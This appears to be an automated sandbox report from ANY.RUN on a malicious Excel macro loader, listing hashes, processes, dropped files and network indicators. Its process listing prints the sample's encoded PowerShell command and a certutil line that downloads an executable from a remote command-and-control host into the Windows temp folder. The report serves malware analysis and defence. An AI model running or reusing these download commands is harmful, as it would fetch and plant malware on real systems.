analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

af60f6d3bfe9631442cb31de0b08fcb5fe261e457c6053646479558c94755296.xls

Full analysis: https://app.any.run/tasks/afce1f09-b62f-4d2d-ae6d-af8de6f080d6
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 02:09:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 11 17:38:09 2019, Security: 0
MD5:

7588267EAB1C40A72575C9F2C7065DCF

SHA1:

9BE0972A8CAA3C8DDDCB9F0BFADF27DB9720C7B7

SHA256:

AF60F6D3BFE9631442CB31DE0B08FCB5FE261E457C6053646479558C94755296

SSDEEP:

768:RyGxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAKDdY7botBpMEH20946tcciSkNO:oGxEtjPOtioVjDGUU1qfDlaGGx+cL2Qc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CertUtil for downloading files

      • powershell.exe (PID: 764)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 764)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3152)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Excel 2003 Worksheet
CompObjUserTypeLen: 31
HeadingPairs:
  • Worksheets
  • 1
TitleOfParts: Sheet1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2019:04:11 16:38:09
CreateDate: 2006:09:16 00:00:00
Software: Microsoft Excel
LastModifiedBy: -
Author: -
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs powershell.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
3152"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
764powershell -noP -sta -w 1 -enc YwBlAHIAdAB1AHQAaQBsACAALQBzAHAAbABpAHQAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQBhAG4AZABjAG8AbgB0AHIAbwBsAC4AbgBlAHQAdwBlAHgALgBjAG8AbQA6ADkAMAAwADQALwBmAGkAZQByAGMAZQAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABzAHkAcwBtAG8AbgAuAGUAeABlADsAIABDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHMAeQBzAG0AbwBuAC4AZQB4AGUAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2944"C:\Windows\system32\certutil.exe" -split -urlcache -f http://commandcontrol.netwex.com:9004/fierce.exe C:\Windows\temp\sysmon.exeC:\Windows\system32\certutil.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954429
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
753
Read events
653
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3152EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5517.tmp.cvr
MD5:
SHA256:
764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JCFD3IZR4STWZYSST9IW.temp
MD5:
SHA256:
764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
764powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF105d64.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2944
certutil.exe
178.128.74.203:9004
commandcontrol.netwex.com
Forthnet
GR
unknown

DNS requests

Domain
IP
Reputation
commandcontrol.netwex.com
  • 178.128.74.203
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info